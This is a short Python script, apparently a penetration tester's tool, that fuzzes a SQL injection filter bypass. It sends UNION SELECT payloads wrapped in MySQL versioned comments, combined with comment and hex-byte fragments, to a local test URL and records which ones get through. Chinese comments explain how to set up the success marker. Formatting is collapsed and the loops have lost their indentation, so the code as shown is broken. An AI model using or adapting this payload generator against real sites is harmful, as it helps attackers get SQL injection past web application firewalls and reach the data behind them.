1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39
| #encoding=utf-8
import requests import random
url = "http://192.168.235.133/2.php?a=1" Fuzz_a = ['/*!14450','*/','/**/','/','-','+'] #Fuzz_a = [''] Fuzz_b = [''] #Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j'] Fuzz_c = [] for line in open('HexValsAllBytes.txt','r').readlines(): Fuzz_c.append(line.strip('\n'))
FUZZ = Fuzz_a+Fuzz_b+Fuzz_c #配置fuzz字典 header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'} #设置请求的headers for a in FUZZ: pass for b in FUZZ: pass for c in FUZZ: for d in FUZZ: pass for e in FUZZ: pass PYLOAD = "/*!uNion"+a+b+c+d+e+"seLect*/1,3333" urlp = url+PYLOAD #print(urlp) res = requests.get(urlp,headers=header) #print(res.text) #使用for排列组合fuzz字典并请求页面 if '1xiaobai13333' in res.text: #这个flag需要改,根据你测的正常页面中,有什么字段是必然出现的 print ("[*]URL:"+ urlp +"BYPASS!") f=open('result.txt','a') f.write(urlp+"\n") f.close
|